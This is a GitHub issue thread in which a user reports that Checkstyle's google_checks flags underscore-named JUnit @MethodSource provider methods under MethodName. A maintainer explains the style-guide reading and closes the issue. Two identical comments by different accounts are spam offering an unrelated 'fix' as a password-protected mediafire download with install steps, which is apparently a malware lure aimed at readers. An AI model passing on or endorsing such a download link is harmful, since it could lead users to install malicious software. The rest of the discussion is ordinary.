### ISSUE TITLE
google_checks failing on 'MethodName' for conventionally-named @MethodSource methods

### ISSUE THREAD

**Issue by mches** [checkstyle/checkstyle#15599]
I have read check documentation: https://checkstyle.org/checks/naming/methodname.html
I have downloaded the latest checkstyle from: https://checkstyle.org/cmdline.html#Download_and_Run
I have executed the cli and showed it below, as cli describes the problem better than 1,000 words

```bash
/var/tmp $ javac -cp apiguardian-api-1.1.2.jar:junit-jupiter-api-5.11.0.jar:junit-jupiter-params-5.11.0.jar StringTest.java

/var/tmp $ cat google_checks.xml
cat: google_checks.xml: No such file or directory

/var/tmp $ cat StringTest.java
import static org.junit.jupiter.api.Assertions.assertEquals;
import static org.junit.jupiter.api.Assertions.assertThrows;
import static org.junit.jupiter.params.provider.Arguments.arguments;

import java.util.stream.Stream;
import org.junit.jupiter.params.ParameterizedTest;
import org.junit.jupiter.params.provider.Arguments;
import org.junit.jupiter.params.provider.MethodSource;

class StringTest {
  static Stream<Arguments> substring_int() {
    return Stream.of(
        arguments("foo", 0, "foo"),
        arguments("foo", 1, "oo"),
        arguments("foo", 2, "o"),
        arguments("foo", 3, ""));
  }

  @ParameterizedTest
  @MethodSource
  void substring_int(String s, int beginIndex, String expected) {
    assertEquals(expected, s.substring(beginIndex));
  }

  static Stream<Arguments> substring_int_throws() {
    return Stream.of(arguments("foo", -1), arguments("foo", 4));
  }

  @ParameterizedTest
  @MethodSource
  void substring_int_throws(String s, int beginIndex) {
    assertThrows(IndexOutOfBoundsException.class, () -> s.substring(beginIndex));
  }
}

/var/tmp $ java $RUN_LOCALE -jar checkstyle-10.18.1-all.jar -c google_checks.xml StringTest.java
Starting audit...
[WARN] /var/tmp/StringTest.java:11:28: Method name 'substring_int' must match pattern '^[a-z][a-z0-9][a-zA-Z0-9]*$'. [MethodName]
[WARN] /var/tmp/StringTest.java:25:28: Method name 'substring_int_throws' must match pattern '^[a-z][a-z0-9][a-zA-Z0-9]*$'. [MethodName]
Audit done.
```

---

**Describe what you expect in detail.**
The conventionally-named `@MethodSource` methods should pass `google_checks` `MethodName` check. If there's a `@ParameterizedTest @MethodSource` method with `lowerCamelCase` components separated by underscores (`_`), which passes the `MethodName` check, then a method with the same name, which may have no annotations at all, should also pass the check. Such methods are ordinarily static, but could also be non-static with `@TestInstance(Lifecycle.PER_CLASS)`. It's worth noting that the methods must be grouped together to pass the `OverloadMethodsDeclarationOrder` check. 

References:
* https://junit.org/junit5/docs/current/user-guide/#writing-tests-parameterized-tests-sources-MethodSource
* https://google.github.io/styleguide/javaguide.html#s5.2.3-method-names
* https://google.github.io/styleguide/javaguide.html#s3.4.2-ordering-class-contents
---

Still not clear ???
see example - https://checkstyle.org/report_issue.html#How_to_report_a_bug.3F

ATTENTION: FAILURE TO FOLLOW THE ABOVE TEMPLATE WILL RESULT IN THE ISSUE BEING CLOSED.

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by romani** [comment]
You didn't not share config file.

Please use command `java $RUN_LOCALE -jar checkstyle-10.18.1-all.jar -c /google_checks.xml StringTest.java`

Attention to `/` before `google_checks.xml`.
This will use config from jar.

We did a fix in config to cover this case.

**Comment by romani** [comment]
Oh, violation on
`static Stream<Arguments> substring_int() {`
Not a test method.

**Comment by mches** [comment]
> Oh, violation on `static Stream<Arguments> substring_int() {` And `static Stream<Arguments> substring_int_throws() {` Not a test method.

Thanks for the quick response. Yes, we could could say that. Or we could say the two are a unit, since they cooperate by convention. JUnit and the IDE look for a conventionally-named method when using the `@MethodSource` annotation without a value. The IDE reports an error if the method is missing and offers to create a stub. All workarounds I can think of are bucking convention over configuration.

**Comment by romani** [comment]
from style guide:
> Underscores may appear in JUnit test method names to separate logical components of the name, with each component written in [lowerCamelCase](https://google.github.io/styleguide/javaguide.html#s5.3-camel-case), for example transferMoney_deductsFromSource. There is no One Correct Way to name test methods.

your methods are not `JUnit test method` , so we unlikely to change our config until you get confirmation from Google style owners that your case is valid.

BUT we recommend you to update config and ignore all MethidNames in classes that are end with `Test`.
Fix should be at https://github.com/checkstyle/checkstyle/blob/5472ce3b3127d0c6f69bfa6b94978d1792667fe6/src/main/resources/google_checks.xml#L358-L361
and you will keep names as you like.

**Comment by mches** [comment]
Could you confirm who "Google style owners" are? Is this Google, or designated members of the Checkstyle community responsible for `google_checks.xml`? Thanks again.

**Comment by romani** [comment]
https://github.com/google/styleguide

Checkstyle is not related to Google team that reading style guide and interpret text in style guide in most reasonable ( subjective) way.
There are a lot gray areas in style guide.

**Comment by romani** [comment]
I am closing this issue for now.
We can reopen it when we get feedback from style owners.
